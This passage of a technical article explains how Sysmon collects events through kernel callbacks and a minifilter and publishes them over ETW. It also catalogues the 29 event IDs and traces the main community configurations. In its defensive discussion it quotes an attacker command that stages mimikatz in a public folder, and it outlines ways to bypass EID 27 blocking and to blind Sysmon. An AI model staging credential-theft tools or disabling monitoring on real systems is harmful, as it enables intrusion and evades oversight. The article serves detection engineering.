If you have ever read that Sysmon is an "ETW-based event source," you have read something that is half-true. The half that is right is the output side: Sysmon publishes its events through an ETW provider called Microsoft-Windows-Sysmon, and the rest of the system -- including the Windows Event Log service -- subscribes to that provider. The half that is wrong is the input side. Sysmon does not get most of its raw observations from ETW. It gets them from five kernel-callback families and one Filter Manager minifilter, with two narrow ETW-consumer exceptions (DNS-Client for EID 22; the WMI activity provider for EIDs 19-21).

This distinction is small enough that most blog posts skip it and big enough that getting it wrong leads to architectural confusion. The split between collection (how data enters the Sysmon driver) and emission (how data leaves the Sysmon service) is the first thing to get straight.

Event Tracing for Windows (ETW): The in-kernel, low-overhead, manifest-described tracing infrastructure built into Windows since Windows 2000. Providers publish structured events; controllers start trace sessions and select which providers to enable; consumers receive events live or read them from `.etl` files. Sysmon uses ETW as its *output* bus -- its kernel driver hands events to the user-mode service via a private ETW session -- and as a small input source: the Microsoft-Windows-DNS-Client provider (EID 22) and the WMI activity provider (EIDs 19-21).

Kernel callback: A Microsoft-sanctioned ring-0 API for observing operating-system events without patching the System Service Descriptor Table. The Windows kernel exposes a small set of named callback APIs -- `PsSetCreateProcessNotifyRoutineEx` for process create and exit, `PsSetLoadImageNotifyRoutine` for image load (with a `SystemModeImage` bit that distinguishes kernel drivers from user-mode DLLs), `PsSetCreateThreadNotifyRoutineEx` for thread creation (its public callback receives a process ID, a thread ID, and a create/exit Boolean, so "remote" is an inference the driver draws rather than a flag the kernel supplies), `ObRegisterCallbacks` for handle-rights filtering against `PsProcessType` and `PsThreadType`, `CmRegisterCallbackEx` for registry operations, and the Filter Manager minifilter framework for file-system I/O. A driver registers a function pointer; the kernel invokes it on the corresponding event with the structured context. PatchGuard tolerates kernel callbacks; it does not tolerate SSDT patching [@wikipedia-kpp][@pssetcreateex-msdn][@ms-wdk-kernel-callbacks].

Filter Manager: The file-system filter-driver framework (`FltMgr.sys`) that hosts minifilter drivers between the I/O manager and the file-system stack. Each minifilter is loaded at an *altitude*, a Microsoft-allocated decimal number stored as a string (typical values run to six digits, so it is not a small fixed-width priority), and receives pre- and post-operation callbacks on operations such as file create, file write, set-information, and set-security. Higher altitudes sit closer to the I/O manager and see pre-operation callbacks first. Both `SysmonDrv.sys` and `WdFilter.sys` are minifilters; they coexist at different altitudes without colliding [@sysmon-ms-learn].
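To make the altitude rule concrete, here is a minimal C sketch of the ordering Filter Manager applies: pre-operation callbacks run from the highest altitude down, and post-operation callbacks run in the reverse order. The `Minifilter` struct, the filter names, and the altitude strings are hypothetical illustrations, not the registered values of `SysmonDrv.sys`, `WdFilter.sys`, or any other real driver, and `strtod` only approximates the arbitrary-precision decimal interpretation Microsoft documents for altitude strings.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical minifilter descriptor: a name plus its altitude string.
 * Values used with this sketch are illustrative only. */
typedef struct {
    const char *name;
    const char *altitude;   /* decimal string, e.g. "385201" or "360000.5" */
} Minifilter;

/* strtod is adequate for typical six-digit altitudes; it is an
 * approximation of the arbitrary-precision comparison, not a replica. */
static double altitude_value(const char *altitude) {
    return strtod(altitude, NULL);
}

/* qsort comparator: higher altitude sorts first. */
static int by_altitude_desc(const void *a, const void *b) {
    double x = altitude_value(((const Minifilter *)a)->altitude);
    double y = altitude_value(((const Minifilter *)b)->altitude);
    return (x < y) - (x > y);
}

/* Sort filters into pre-operation call order (highest altitude first).
 * Post-operation callbacks are delivered in the reverse of this order. */
void sort_pre_operation_order(Minifilter *filters, size_t count) {
    qsort(filters, count, sizeof *filters, by_altitude_desc);
}
```

Given illustrative altitudes of 385201, 360000.5, and 320000, the 385201 filter sees each pre-operation callback first and each post-operation callback last.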

Five collection mechanisms, one ETW publisher

The Microsoft Learn page for Sysmon enumerates the event IDs and describes them at the what level; the how (which kernel API actually produced each event) is documented partly in the API references for each callback API and partly in the source code of Sysmon's open Linux port, microsoft/SysmonForLinux, which reuses Sysinternals' shared C++ rule engine to parse the same XML schema but collects its events with eBPF instead of kernel callbacks [@github-sysmon-linux][@sysmon-ms-learn]. The Windows port is closed source, but Sysinternals' design has been documented enough -- across the RSA 2014 talk, the Diversenok 2022 reverse-engineering writeup, and the SysmonForLinux source -- that the collection-mechanism inventory is unambiguous.

The mechanisms, counted at the stricter six-row granularity, are:

Mechanism	API or framework	Sysmon EIDs produced
Process-lifetime callback	`PsSetCreateProcessNotifyRoutineEx`	1 (ProcessCreate), 5 (ProcessTerminate)
Image-load callback	`PsSetLoadImageNotifyRoutine`	7 (ImageLoad); 6 (DriverLoad, distinguished by the `IMAGE_INFO.SystemModeImage` flag on the kernel-mode image)
Thread-creation callback	`PsSetCreateThreadNotifyRoutineEx` (the public callback carries no remote-thread flag; remote creation is inferred by the driver)	8 (CreateRemoteThread)
Object Manager callback	`ObRegisterCallbacks` against `PsProcessType`	10 (ProcessAccess)
Registry callback	`CmRegisterCallbackEx`	12 (Registry Object Create/Delete), 13 (Registry Value Set), 14 (Registry Key/Value Rename)
Filter Manager minifilter	`FltRegisterFilter` with callbacks on create, cleanup/close, and set-information operations -- on the ordinary file system, and on the Named Pipe File System (NPFS, `\Device\NamedPipe`) at a different altitude	2 (FileCreateTime), 11 (FileCreate), 15 (FileCreateStreamHash), 17 (PipeEvent Created), 18 (PipeEvent Connected), 23 (FileDelete archived), 26 (FileDeleteDetected), 27 (FileBlockExecutable), 28 (FileBlockShredding), 29 (FileExecutableDetected)

The five-mechanism framing collapses thread-creation and Object Manager callbacks into one architectural family ("process and thread observation via Microsoft-sanctioned callbacks"); a stricter count is six (process-lifetime, image-load, thread-creation, object-handle, registry, minifilter). Either count is defensible; what matters is keeping the API attribution honest: PsSetCreateThreadNotifyRoutineEx is the canonical remote-thread observer, ObRegisterCallbacks(PsProcessType) is the canonical handle-rights filter, and NPFS minifiltering -- not ObRegisterCallbacks -- is what observes named-pipe creation and connection.

The sixth source -- the ETW consumer path -- is special. For DNS queries (EID 22), Sysmon does not register a kernel callback. It subscribes as a consumer of the Microsoft-published Microsoft-Windows-DNS-Client ETW provider, parses the structured DNS events, and republishes them through its own ETW provider with the Sysmon enrichments applied [@sysmon-version-history]. DNS-Client is the clearest case of Sysmon consuming a Microsoft-published ETW provider; the WmiEvent family (EIDs 19-21) is implemented in a similar consumer style against the WMI activity provider's user-mode tracing surface, which is why the §4 catalogue marks those rows as "WMI ETW provider consumer." Either way, ETW consumption is the input-side exception, not the rule: the kernel-callback families and the minifilter do the bulk of the work, and ETW is the input only for a small, deliberately chosen set of events.

The Sysmon ETW provider has the GUID {5770385F-C22A-43E0-BF4C-06F5698FFBD9}. Microsoft Learn does not enumerate this GUID on the Sysmon page; the authoritative on-host discovery command is logman query providers Microsoft-Windows-Sysmon, which returns the GUID, the keywords mask, and the registered processes. Pavel Yosifovich's community ETW-provider browser EtwExplorer shows the same value [@etwexplorer-sysmon-guid], with the on-host logman command remaining the authority of last resort.

The ProcessCreate path, step by step

The clearest way to see how the pieces fit is to trace one event. Sysmon's process-create handling is the most-quoted EID in the manifest -- it is the EID that produces Maya's row in §1 -- and it follows the canonical kernel-callback pattern that Microsoft codified in PsSetCreateProcessNotifyRoutineEx:

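// Conceptual pseudocode for SysmonDrv's process-create path.
// Real Sysmon source for Windows is closed; the Linux port is open.
// This is the contract documented in the WDK reference for
// PsSetCreateProcessNotifyRoutineEx. The Sysmon* names are illustrative,
// not Sysmon's real internal symbols.

#include <ntddk.h>

// PCREATE_PROCESS_NOTIFY_ROUTINE_EX: the parent PID is not a parameter;
// it arrives in CreateInfo->ParentProcessId.
VOID SysmonProcessCreateCb(PEPROCESS Process, HANDLE ProcessId,
                           PPS_CREATE_NOTIFY_INFO CreateInfo);

NTSTATUS SysmonDrvEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(DriverObject);
    UNREFERENCED_PARAMETER(RegistryPath);
    // 1. Register the create-process callback. PatchGuard tolerates this.
    //    The call returns STATUS_ACCESS_DENIED unless the driver image was
    //    linked with /INTEGRITYCHECK, so the status must be checked.
    NTSTATUS status = PsSetCreateProcessNotifyRoutineEx(SysmonProcessCreateCb, FALSE);
    if (!NT_SUCCESS(status)) {
        return status;
    }
    // ... other callbacks registered similarly ...
    return STATUS_SUCCESS;
}

VOID SysmonProcessCreateCb(
    PEPROCESS               Process,     // EPROCESS of the new or exiting process
    HANDLE                  ProcessId,
    PPS_CREATE_NOTIFY_INFO  CreateInfo   // NULL on process exit
) {
    UNREFERENCED_PARAMETER(Process);
    if (CreateInfo == NULL) {
        // Process exit: emit EID 5 (ProcessTerminate).
        SysmonEmitEventEID5(ProcessId);
        return;
    }
    // Process create. Apply the XML rule engine: does this process
    // match any <Include> rule, after evaluating <Exclude> overrides?
    if (!SysmonRuleMatch(EID_1, CreateInfo)) {
        return;  // Filtered: produce no event.
    }
    // Enrich with parent process (CreateInfo->ParentProcessId), command
    // line (CreateInfo->CommandLine), image hash, integrity level, user
    // SID, ProcessGuid, and session identifiers, then ship through the
    // private Microsoft-Windows-Sysmon ETW publisher.
    SysmonEmitEventEID1(ProcessId, CreateInfo);
}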

Four properties of the path matter. First, the callback is invoked synchronously on the thread that issued the CreateProcessW call, before the new process's first instruction runs; the parent and child PIDs are both known, but the new process has not yet executed any user-mode code. Second, event volume is bounded only by your rule engine -- there is no built-in throttle, and a verbose <Include> rule on a high-process-turnover host can saturate the ETW session. Third, the callback runs at IRQL = PASSIVE_LEVEL, so it can do file I/O (which the driver needs for hashing), but it must do that I/O carefully to avoid deadlock on the very file system it is monitoring. Fourth, the Sysmon service runs as a separate user-mode process; if the service has crashed or been suspended, the driver continues to emit ETW events into a session with no listener, and they evaporate.
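The `SysmonRuleMatch` step in the pseudocode hides the rule engine's one load-bearing semantic: an `<Exclude>` match overrides an `<Include>` match. A minimal C sketch of that decision follows. Everything in it is hypothetical: the type and function names are invented, only three conditions (is, contains, end with) are modelled, and matching is assumed case-insensitive. The real engine also handles RuleGroup AND/OR logic and many more conditions and fields. In this sketch, an include group with no matching rule logs nothing, and an event type configured only with excludes logs everything not excluded.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical, simplified model of per-event-type filtering. */
typedef enum { COND_IS, COND_CONTAINS, COND_END_WITH } Condition;

typedef struct {
    Condition condition;
    const char *value;
} Rule;

typedef struct {
    const Rule *includes; size_t n_includes;
    bool has_include_group;            /* an onmatch="include" group exists */
    const Rule *excludes; size_t n_excludes;
} EventFilter;

/* Case-insensitive comparison of the first n bytes (assumption). */
static bool ieq(const char *a, const char *b, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return false;
    return true;
}

static bool rule_matches(const Rule *r, const char *field) {
    size_t flen = strlen(field), vlen = strlen(r->value);
    switch (r->condition) {
    case COND_IS:
        return flen == vlen && ieq(field, r->value, vlen);
    case COND_END_WITH:
        return flen >= vlen && ieq(field + flen - vlen, r->value, vlen);
    case COND_CONTAINS:
        for (size_t i = 0; i + vlen <= flen; i++)
            if (ieq(field + i, r->value, vlen)) return true;
        return false;
    }
    return false;
}

static bool any_match(const Rule *rules, size_t n, const char *field) {
    for (size_t i = 0; i < n; i++)
        if (rule_matches(&rules[i], field)) return true;
    return false;
}

/* Returns true if the event should be logged. Exclude wins over include. */
bool should_log(const EventFilter *f, const char *field) {
    if (any_match(f->excludes, f->n_excludes, field)) return false;
    if (!f->has_include_group) return true;
    return any_match(f->includes, f->n_includes, field);
}
```

For example, with an include of `end with \powershell.exe` and an exclude of `contains \Trusted\`, an image at `C:\Trusted\powershell.exe` is dropped even though it matches the include.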

ProcessGuid: Sysmon's per-process unique identifier, formatted as a 128-bit GUID and recorded as the `ProcessGuid` field on every event that names a process. Unlike a Windows process ID, the ProcessGuid survives PID reuse and uniquely identifies a process across its lifetime [@sysmon-ms-learn]; SOC tooling commonly joins on `(DeviceId, ProcessGuid)` to reconstruct process trees and avoid the PID-reuse race condition that plagues raw `ProcessId` joins.
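A minimal C sketch of the `(DeviceId, ProcessGuid)` join, under stated assumptions: the `ProcessRecord` struct and both functions are hypothetical, `DeviceId` stands for whatever host identifier the collection pipeline attaches (Sysmon itself does not emit it), and GUIDs are kept as plain strings. `ParentProcessGuid` is the EID 1 field that makes the parent lookup possible.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical process record distilled from Sysmon EID 1 events. */
typedef struct {
    const char *device_id;            /* pipeline-supplied host identifier */
    unsigned    process_id;
    const char *process_guid;
    const char *parent_process_guid;
    const char *image;
} ProcessRecord;

/* Find the parent of `child` by joining on (DeviceId, ProcessGuid).
 * Returns NULL when the parent was not observed. */
const ProcessRecord *find_parent(const ProcessRecord *records, size_t n,
                                 const ProcessRecord *child) {
    for (size_t i = 0; i < n; i++) {
        if (strcmp(records[i].device_id, child->device_id) == 0 &&
            strcmp(records[i].process_guid, child->parent_process_guid) == 0)
            return &records[i];
    }
    return NULL;
}

/* Count records holding `pid` on one device. A result above one is the
 * PID-reuse ambiguity that a raw ProcessId join cannot resolve. */
size_t count_pid_holders(const ProcessRecord *records, size_t n,
                         const char *device_id, unsigned pid) {
    size_t count = 0;
    for (size_t i = 0; i < n; i++)
        if (records[i].process_id == pid &&
            strcmp(records[i].device_id, device_id) == 0)
            count++;
    return count;
}
```

With two records holding the same PID on one device (an exited `explorer.exe` and a later `svchost.exe` that reused the PID), a PID join for a child of that PID is ambiguous, while the GUID join returns the original parent.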

Where the events go

Once the user-mode Sysmon.exe service has labelled the event, it does two things. First, it writes the event to the Windows event log -- specifically to Applications and Services Logs/Microsoft/Windows/Sysmon/Operational per Microsoft Learn's verbatim statement: "On Vista and higher, events are stored in Applications and Services Logs/Microsoft/Windows/Sysmon/Operational" [@sysmon-ms-learn]. Second, the same event is visible to any ETW real-time consumer subscribed to Microsoft-Windows-Sysmon. Downstream collectors (Windows Event Forwarding, Splunk's universal forwarder, the Elastic Windows integration, Wazuh's Windows agent) typically subscribe to the Sysmon/Operational channel through the Windows Event Log APIs rather than tailing the .evtx file on disk.

flowchart LR
    K1["PsSetCreateProcessNotifyRoutineEx"] --> D[SysmonDrv.sys]
    K2["PsSetLoadImageNotifyRoutine"] --> D
    K3["PsSetCreateThreadNotifyRoutineEx"] --> D
    K4["ObRegisterCallbacks (PsProcessType)"] --> D
    K5["CmRegisterCallbackEx"] --> D
    K6["FltRegisterFilter (file system + NPFS)"] --> D
    K7["ETW consumer: DNS-Client + WMI activity"] --> D
    D --> P["ETW publisher: Microsoft-Windows-Sysmon"]
    P --> S[Sysmon.exe service]
    S --> L["Applications and Services Logs / Microsoft / Windows / Sysmon / Operational"]
    L --> C["Event log collectors (WEF, Splunk UF, Wazuh, Elastic)"]
    P --> R["Real-time ETW consumers"]

This is the first aha moment. Sysmon is not "ETW based" in the way most blog posts imply. Sysmon is a kernel driver that uses ETW as its IPC bus to user mode, and as a special-case consumer for a small set of providers (DNS-Client, plus the WMI activity surface). The reason Sysmon needed a kernel driver in the first place is that ETW alone could not see what the kernel callbacks see: ETW could not, in 2014, deliver a synchronous parent-PID-and-image-hash structure at process create time. Sysmon's driver does that work; ETW transports the result.

The protected-process gate added in v15 (June 2023) closed the most trivial blinding attack: a SYSTEM-privilege process can no longer issue OpenProcess(PROCESS_TERMINATE) against the Sysmon service to silence it. Raising the bar to a kernel-mode primitive does not eliminate the attack class, but it does change the cost model. The protected-process gate is the architectural inflection that distinguishes pre-v15 Sysmon (trivially blindable) from post-v15 Sysmon (requires a kernel primitive or a BYOVD chain) [@sysmon-ms-learn][@bleepingcomputer-sysmon15].

Five collection mechanisms, one ETW publisher, one event log. That is the input side. Now the catalogue.

4. The Sysmon Event Catalogue: Twenty-Nine IDs and Their Version Gating

Run sysmon -s on any v15.2 host and you get an XML schema enumerating twenty-nine event types plus EID 255 (Error). Every detection-engineering corpus in the field -- SwiftOnSecurity's config, Florian Roth's fork, Hartong's modular, the SigmaHQ rule base, the Threat Hunter Playbook -- is downstream of this single schema [@sysmon-ms-learn][@github-sigma][@github-otrf-thp]. Learn the catalogue once and the rest of the Sysmon toolchain unfolds from it.

A naming disambiguation is worth doing first, because the colloquial event names used in the field differ from the canonical Microsoft Learn names. "RegistrySet" is a colloquial pun on RegistryEvent (Value Set), EID 13. "DnsQuery" is a colloquial shorthand for DNSEvent (DNS query), EID 22. "NamedPipeConnect" is two events at once: PipeEvent (Pipe Created), EID 17, and PipeEvent (Pipe Connected), EID 18. The article uses the canonical Microsoft Learn names from here on.

Note: Sysmon's manifest names some events as a family with a parenthetical operation: RegistryEvent (Object create and delete) (EID 12), RegistryEvent (Value Set) (EID 13), RegistryEvent (Key and Value Rename) (EID 14). The same pattern applies to the pipe events: PipeEvent (Pipe Created) (EID 17) and PipeEvent (Pipe Connected) (EID 18). When detection-rule tooling references "EID 12-14" or "EID 17-18", these families are what it means. The colloquial single-name forms used elsewhere in the literature are not wrong; they are just less precise. The MDE schema does not preserve the parenthetical operation suffix; it surfaces these as ActionType values inside DeviceRegistryEvents.

The twenty-nine plus one catalogue

The catalogue groups naturally by the collection mechanism that produces each event:

EID	Canonical name	Collection mechanism	Introduced	Maps to (MDE)
1	ProcessCreate	`PsSetCreateProcessNotifyRoutineEx`	v1.0 (Aug 2014)	`DeviceProcessEvents` (`ProcessCreated`)
2	FileCreateTime	Filter Manager	v1.0 (Aug 2014)	`DeviceFileEvents` (`FileCreated`, partial)
3	NetworkConnect	Internal network-callout	v1.0 (Aug 2014)	`DeviceNetworkEvents` (`ConnectionSuccess`)
4	ServiceStateChange	Sysmon-internal	v1.0 (Aug 2014)	(Sysmon-only)
5	ProcessTerminate	`PsSetCreateProcessNotifyRoutineEx`	v1.0 (Aug 2014)	`DeviceProcessEvents` (`ProcessTerminated`)
6	DriverLoad	`PsSetLoadImageNotifyRoutine` (kernel-mode case via `IMAGE_INFO.SystemModeImage`)	v2.0 (2015)	`DeviceEvents` (`DriverLoad`)
7	ImageLoad	`PsSetLoadImageNotifyRoutine`	v2.0 (2015)	`DeviceImageLoadEvents`
8	CreateRemoteThread	`PsSetCreateThreadNotifyRoutineEx` (remote creation inferred by the driver)	v3.0 (2016)	`DeviceEvents` (truncated)
9	RawAccessRead	Raw-read detection on `\Device\Harddisk*`	v3.0 (2016)	(Sysmon-only)
10	ProcessAccess	`ObRegisterCallbacks` (PsProcessType)	v6.0 (Feb 2017)	`DeviceEvents` (GrantedAccess truncated)
11	FileCreate	Filter Manager	v6.0 (Feb 2017)	`DeviceFileEvents`
12	RegistryEvent (Object create/delete)	`CmRegisterCallbackEx`	v6.0 (Feb 2017)	`DeviceRegistryEvents`
13	RegistryEvent (Value Set)	`CmRegisterCallbackEx`	v6.0 (Feb 2017)	`DeviceRegistryEvents`
14	RegistryEvent (Key/Value Rename)	`CmRegisterCallbackEx`	v6.0 (Feb 2017)	`DeviceRegistryEvents`
15	FileCreateStreamHash	Filter Manager	v6.0 (Feb 2017)	(Sysmon-only)
16	ServiceConfigurationChange	Sysmon-internal	v6.0 (Feb 2017)	(Sysmon-only)
17	PipeEvent (Pipe Created)	Filter Manager minifilter on NPFS (`\Device\NamedPipe`)	v6.0 (Feb 2017)	(Sysmon-only)
18	PipeEvent (Pipe Connected)	Filter Manager minifilter on NPFS (`\Device\NamedPipe`)	v6.0 (Feb 2017)	(Sysmon-only)
19	WmiEvent (filter)	WMI ETW provider consumer	v6.10 (mid-2017)	(Sysmon-only)
20	WmiEvent (consumer)	WMI ETW provider consumer	v6.10 (mid-2017)	(Sysmon-only)
21	WmiEvent (consumer-to-filter binding)	WMI ETW provider consumer	v6.10 (mid-2017)	(Sysmon-only)
22	DNSEvent (DNS query)	ETW consumer of `Microsoft-Windows-DNS-Client`	v10.0 (Jun 2019)	`DeviceNetworkEvents` (`DnsQuery`)
23	FileDelete (archive)	Filter Manager	v11.10 (Jun 2020)	`DeviceFileEvents` (partial)
24	ClipboardChange	RDP and Win32 clipboard hooks	v13.0 (2021; disputed)	(Sysmon-only)
25	ProcessTampering	Image-load and `WriteProcessMemory` heuristic	v13.0 (2021; disputed)	(Sysmon-only)
26	FileDeleteDetected	Filter Manager (non-archiving)	v13.30 (2022)	`DeviceFileEvents`
27	FileBlockExecutable	Filter Manager (blocking)	v14.0 (Aug 2022)	(Sysmon-only)
28	FileBlockShredding	Filter Manager (blocking)	v14.10 (2022)	(Sysmon-only)
29	FileExecutableDetected	Filter Manager	v15.0 (Jun 2023)	`DeviceFileEvents`
255	Error	Sysmon-internal	v1.0 (Aug 2014)	(Sysmon-only)

The Sysmon Version History repository's "Outdated" disclaimer ("I didn't find enough time to update this repo - sorry") means the v12 vs v13 boundary for ClipboardChange and ProcessTampering is community-disputed. The canonical Microsoft Learn page does not enumerate version-introduction metadata per event ID. The dates in the table for EIDs 24 and 25 are best-effort community attributions and should be treated as approximate until Microsoft publishes a per-EID version history [@sysmon-version-history][@sysmon-ms-learn].
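Because the augment question in §5 and §10 reduces to "which EIDs have no MDE counterpart," it helps to treat the table as data. The C sketch below encodes the table's rows under stated assumptions: partial and truncated mappings count as counterparts, EID 255 is left out of the Sysmon-only set, and the mapping is this article's reading rather than a Microsoft-published cross-walk. The type and function names are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>

/* One row of the catalogue table: EID, canonical name, and whether the
 * table lists any MDE Device* counterpart (partial/truncated included). */
typedef struct {
    int eid;
    const char *name;
    bool has_mde_counterpart;
} SysmonEvent;

static const SysmonEvent CATALOGUE[] = {
    {1, "ProcessCreate", true},          {2, "FileCreateTime", true},
    {3, "NetworkConnect", true},         {4, "ServiceStateChange", false},
    {5, "ProcessTerminate", true},       {6, "DriverLoad", true},
    {7, "ImageLoad", true},              {8, "CreateRemoteThread", true},
    {9, "RawAccessRead", false},         {10, "ProcessAccess", true},
    {11, "FileCreate", true},
    {12, "RegistryEvent (Object create/delete)", true},
    {13, "RegistryEvent (Value Set)", true},
    {14, "RegistryEvent (Key/Value Rename)", true},
    {15, "FileCreateStreamHash", false}, {16, "ServiceConfigurationChange", false},
    {17, "PipeEvent (Pipe Created)", false},
    {18, "PipeEvent (Pipe Connected)", false},
    {19, "WmiEvent (filter)", false},    {20, "WmiEvent (consumer)", false},
    {21, "WmiEvent (consumer-to-filter binding)", false},
    {22, "DNSEvent (DNS query)", true},  {23, "FileDelete (archive)", true},
    {24, "ClipboardChange", false},      {25, "ProcessTampering", false},
    {26, "FileDeleteDetected", true},    {27, "FileBlockExecutable", false},
    {28, "FileBlockShredding", false},   {29, "FileExecutableDetected", true},
    {255, "Error", false},
};

#define CATALOGUE_LEN (sizeof CATALOGUE / sizeof CATALOGUE[0])

/* Return the row for `eid`, or NULL if the EID is not in the table. */
const SysmonEvent *lookup_eid(int eid) {
    for (size_t i = 0; i < CATALOGUE_LEN; i++)
        if (CATALOGUE[i].eid == eid) return &CATALOGUE[i];
    return NULL;
}

/* Write up to `cap` Sysmon-only EIDs (excluding 255) into `out`, in table
 * order. Returns the total number found, which may exceed `cap`. */
size_t sysmon_only_eids(int *out, size_t cap) {
    size_t found = 0;
    for (size_t i = 0; i < CATALOGUE_LEN; i++) {
        const SysmonEvent *e = &CATALOGUE[i];
        if (e->has_mde_counterpart || e->eid == 255) continue;
        if (found < cap) out[found] = e->eid;
        found++;
    }
    return found;
}
```

Run against the table as written, the Sysmon-only set comes out to thirteen event types: 4, 9, 15 through 21, 24, 25, 27, and 28.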

The design intent, in one sentence

The catalogue exists because Sysmon's design choice -- the one Microsoft Learn still prints today -- explicitly refuses to do detection. The publisher emits structured events; the detection logic is somebody else's problem.

Sysmon does not provide analysis of the events it generates, nor does it attempt to hide itself from attackers.

This is the sentence that explains the entire SwiftOnSecurity-NextronSystems-Hartong configuration lineage [@sysmon-ms-learn]. If Sysmon refuses to do detection, somebody has to write the rules. Three somebodies did, they wrote three different sets, and §5 is about the trade-offs between them.

What EID 27 is, and what it is not

The 2022 introduction of FileBlockExecutable (EID 27) was the first preventive event in Sysmon's history. Olaf Hartong's contemporaneous writeup and Diversenok's independent reproduction both describe what the event does, and the mechanism is more subtle than "the I/O is denied." The Sysmon minifilter intercepts the file-handle close operation. If the rule matches and the file content carries an MZ/PE header, Sysmon logs EID 27 and marks the file for deletion via FILE_DISPOSITION_INFORMATION [@diversenok-2022][@hartong-sysmon14-medium]. The attacker's cmd /c copy mimikatz.exe C:\Users\Public\ produces no command-line error. The copy appears to succeed. The file is then deleted at handle-close time. Hartong's writeup captures the user-visible effect verbatim: "*While there is no error on the command line, the file is not written to disk*" [@hartong-sysmon14-medium]. Diversenok's reverse-engineering reads: "*Sysmon monitors and deletes files on closing instead of writing*" [@diversenok-2022]. The closing-time semantics is the structural reason Diversenok's Bypass #1 (split create-close from open-write-close) works at all; the bypass is incoherent under an Access Denied-at-create model and obvious under the close-time-delete model.
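The "MZ/PE header" test is the one content check the close-time path needs. Sysmon's exact check is not public; the C sketch below assumes it is equivalent to the standard PE-format test: the two-byte DOS signature `MZ` at offset 0, and the four-byte `PE\0\0` signature at the file offset stored little-endian in the DOS header's `e_lfanew` field (offset `0x3C`). The function names are hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Offset of e_lfanew in IMAGE_DOS_HEADER: a little-endian 32-bit file
 * offset pointing at the "PE\0\0" signature. */
#define DOS_E_LFANEW_OFFSET 0x3C

/* True if the buffer starts with the DOS "MZ" signature. */
bool has_mz_header(const uint8_t *buf, size_t len) {
    return len >= 2 && buf[0] == 'M' && buf[1] == 'Z';
}

/* True if the buffer has "MZ" and a "PE\0\0" signature at e_lfanew,
 * with every read bounds-checked against len. */
bool looks_like_pe(const uint8_t *buf, size_t len) {
    if (!has_mz_header(buf, len) || len < DOS_E_LFANEW_OFFSET + 4)
        return false;
    uint32_t e_lfanew = (uint32_t)buf[DOS_E_LFANEW_OFFSET]
                      | (uint32_t)buf[DOS_E_LFANEW_OFFSET + 1] << 8
                      | (uint32_t)buf[DOS_E_LFANEW_OFFSET + 2] << 16
                      | (uint32_t)buf[DOS_E_LFANEW_OFFSET + 3] << 24;
    if (e_lfanew > len || len - e_lfanew < 4)
        return false;
    return buf[e_lfanew] == 'P' && buf[e_lfanew + 1] == 'E' &&
           buf[e_lfanew + 2] == 0 && buf[e_lfanew + 3] == 0;
}
```

The two predicates are kept separate because a two-byte `MZ` check alone also matches arbitrary data that happens to begin with those bytes.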

This is a confined preventive surface, and it should not be confused with Defender's much larger preventive surface. Defender's exploit-protection mitigations (arbitrary code guard, control-flow guard enforcement) and its Attack Surface Reduction rules sit inside the Defender Antivirus and MDE stacks. EID 27's blocking is one Sysmon minifilter making a close-time delete decision about a single file; it is not a general-purpose application allow-list, and it is not a substitute for Windows Defender Application Control. Hartong's writeup is explicit about the scope -- "the FileBlockExecutable event" [@hartong-sysmon14-medium] -- as is Diversenok's: the introduction reads "the update introduced the first preventive measure -- the FileBlockExecutable event (ID 27)" [@diversenok-2022].

Twenty-nine events, four hardening releases, one schema. The catalogue is only useful if you configure Sysmon to emit subsets of it, and configuration is where the field's three lineages diverged.

5. Three Canonical Sysmon Configurations

Nearly every production Sysmon deployment in the field starts from one of three repositories. The lineage matters, and one of the things this article fixes is a common attribution error: "Florian Roth wrote the canonical Sysmon config" is in widespread circulation, but the canonical root is SwiftOnSecurity's repository, and Roth's repo is a 2018 fork of it.

Sigma: The open-source generic signature format authored by Florian Roth and his collaborators at Nextron Systems; the SIEM-and-EDR field's vendor-neutral detection-rule lingua franca. The `SigmaHQ/sigma` repository ships over 3,000 detection rules covering the Windows kernel-callback surface (heavily Sysmon-aware), Linux audit, macOS unified log, AWS CloudTrail, Microsoft 365, and other event sources. Sigma rules are written once and compiled by community converters into the per-tool query languages (KQL for Defender XDR / Sentinel, SPL for Splunk, EQL for Elastic) [@github-sigma].

SwiftOnSecurity/sysmon-config (February 2017)

The historical root. The pseudonymous account SwiftOnSecurity published the first widely-cited Sysmon configuration template on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. The README's design intent is the single sentence still printed at the top of the repo: "This is a Microsoft Sysinternals Sysmon configuration file template with default high-quality event tracing" [@github-swiftonsecurity]. The template emphasises clarity over coverage; the XML is heavily commented, and the rule structure follows a deliberately conservative pattern of <Include> blocks per technique.

SwiftOnSecurity's config is the most-cited starting point for Sysmon deployments worldwide and the one that detection-engineering tutorials default to. It is also the literal GitHub-fork parent of NextronSystems/sysmon-config and, through the historical fork graph, of many other community configs: the GitHub REST API for NextronSystems/sysmon-config returns SwiftOnSecurity/sysmon-config as its parent [@github-nextronsystems-meta].

Neo23x0/sysmon-config, now NextronSystems/sysmon-config (January 2018, renamed 2021)

Florian Roth, working under his GitHub handle @Neo23x0, forked SwiftOnSecurity's config in January 2018, merged the community pull-request backlog, and later added blocking-rule support once Sysmon v14 shipped. The README's design intent reads: "This is a forked and modified version of @SwiftOnSecurity's sysmon config. ... We merged most of the 30+ open pull requests" [@github-neo23x0]. The maintainer roster as of the present writing is Florian Roth (@Neo23x0), Tobias Michalski (@humpalum), Christian Burkard (@phantinuss), and Nasreddine Bencherchali (@nas_bench).

The repository ships a blocking variant, sysmonconfig-export-block.xml, that adds <RuleGroup> blocks targeting EID 27 (FileBlockExecutable) and EID 28 (FileBlockShredding) for the most common malware-staging file paths. This is the variant SOC teams deploy when they want Sysmon's preventive surface to participate in the response pipeline as a hard block rather than as a detection-only artifact.

